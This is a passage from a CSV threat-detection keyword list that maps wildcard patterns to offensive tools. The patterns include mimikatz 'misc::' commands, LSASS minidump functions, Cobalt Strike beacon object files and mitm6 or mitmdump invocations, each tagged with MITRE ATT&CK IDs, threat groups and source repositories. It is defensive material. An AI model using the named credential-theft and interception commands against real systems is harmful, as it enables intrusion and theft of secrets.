T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*minidump_add_memory64_block*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*minidumpwritedump*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*MiniDumpWriteDump*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" 
+"*mirrors.aliyun.com/parrot*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*misc::aadcookie*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::clip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::cmd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::compress*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::detours*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::efs*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::lock*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::memssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::mflt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ncroutemon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ngcsign*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::printnightmare*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::regedit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::shadowcopies*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::skeleton*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::spooler*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::taskmgr*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::wp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::xor*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*miscbackdoorlnkhelp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*missile-command.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mitm6 --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*mitm6 -d *","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" +"*mitm6.py*","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" +"*mitmdump -*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and 
weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mitmdump -s aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*MITMf.py*","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","3480","1090","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z" +"*mitmproxy*","offensive_tool_keyword","mitmproxy","An interactive. 
SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","N/A","10","32422","3800","2023-10-02T22:25:26Z","2010-02-16T04:10:13Z" +"*mitmsocks*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" +"*mitmsocks4j*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" +"*mjnbclmflcpookeapghfhapeffmpodij*","greyware_tool_keyword","Ultrareach VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*mjolnodfokkkaichkcjipfgblbfgojpa*","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. 
malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" 